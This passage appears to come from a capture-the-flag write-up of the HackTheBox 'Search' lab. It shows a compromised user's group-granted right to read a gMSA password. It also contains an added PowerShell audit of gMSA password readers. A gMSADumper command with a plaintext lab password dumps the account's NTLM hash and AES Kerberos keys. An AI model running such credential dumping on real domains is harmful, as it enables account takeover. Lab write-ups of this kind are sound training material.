ReadGMSAPassword


According to the earlier assessment, the sierra.frye user has the ReadGMSAPassword privilege over the BIR-ADFS-GMSA$ account through transitive membership in the ITSEC group. Now that the sierra.frye user has been compromised, I can proceed from here.

The msDS-ManagedPassword attribute is a special LDAP attribute that contains the current gMSA password (as a binary blob); only the principals authorized to retrieve the managed password can read it.
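As an added defensive check that is not part of the original write-up: the PowerShell below lists every gMSA in the domain together with the principals allowed to read its msDS-ManagedPassword, and expands group membership recursively so that a transitive reader (a user such as sierra.frye who inherits the right through a group like ITSec) shows up in an audit rather than only in an attacker's assessment. It assumes a domain-joined host with the ActiveDirectory RSAT module; the function name Get-GmsaReaderReport and its parameter are mine, not from any tool on the page.

```powershell
# Added audit example (not from the original write-up): enumerate gMSAs and the
# principals permitted to read msDS-ManagedPassword, then expand nested group
# membership so every effective reader is visible to the defender.
Import-Module ActiveDirectory

function Get-GmsaReaderReport {
    param(
        # Optional: restrict the report to one gMSA, e.g. 'BIR-ADFS-GMSA$'.
        # Default is every gMSA in the domain.
        [string]$Identity
    )

    $filter = if ($Identity) { "SamAccountName -eq '$Identity'" } else { '*' }
    $accounts = Get-ADServiceAccount -Filter $filter `
        -Properties PrincipalsAllowedToRetrieveManagedPassword

    foreach ($gmsa in $accounts) {
        foreach ($principalDn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
            $principal = Get-ADObject -Identity $principalDn -Properties objectClass, sAMAccountName

            if ($principal.objectClass -eq 'group') {
                # Every user nested anywhere under this group can read the gMSA password.
                $members = Get-ADGroupMember -Identity $principalDn -Recursive |
                           Where-Object { $_.objectClass -eq 'user' }
                foreach ($m in $members) {
                    [pscustomobject]@{
                        gMSA          = $gmsa.SamAccountName
                        DirectReader  = $principal.sAMAccountName
                        EffectiveUser = $m.SamAccountName
                        Via           = 'group membership'
                    }
                }
            } else {
                # A user or computer granted the right directly.
                [pscustomobject]@{
                    gMSA          = $gmsa.SamAccountName
                    DirectReader  = $principal.sAMAccountName
                    EffectiveUser = $principal.sAMAccountName
                    Via           = 'direct'
                }
            }
        }
    }
}

# Usage: review the full table, or flag any gMSA readable by a group that contains
# ordinary user accounts rather than only the intended service hosts.
Get-GmsaReaderReport | Sort-Object gMSA, EffectiveUser | Format-Table -AutoSize
```

The right to read a gMSA password should normally be granted to the computer accounts that run the service, not to user groups; any row whose EffectiveUser is a human account is a candidate for tightening the PrincipalsAllowedToRetrieveManagedPassword list.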

Retrieval


Technically, it is also possible to retrieve the Kerberos secrets (AES128 and AES256 keys), which is preferable for OPSEC. Three well-known tools can be used for the operation:

Both DSInternals and GMSAPasswordReader require a valid session on the target system as the reading user, sierra.frye, whereas gMSADumper can be used remotely.

┌──(gMSADumper)─(kali㉿kali)-[~/archive/htb/labs/search]
└─$ python3 gMSADumper/gMSADumper/gMSADumper.py -d SEARCH.HTB -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -l research.search.htb
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
BIR-ADFS-GMSA$:aes256-cts-hmac-sha1-96:06e03fa99d7a99ee1e58d795dccc7065a08fe7629441e57ce463be2bc51acf38
BIR-ADFS-GMSA$:aes128-cts-hmac-sha1-96:dc4a4346f54c0df29313ff8a21151a42

Those are the Kerberos secrets in both AES128 and AES256 format, as well as the NTLM hash. Validation will be done by requesting a TGT.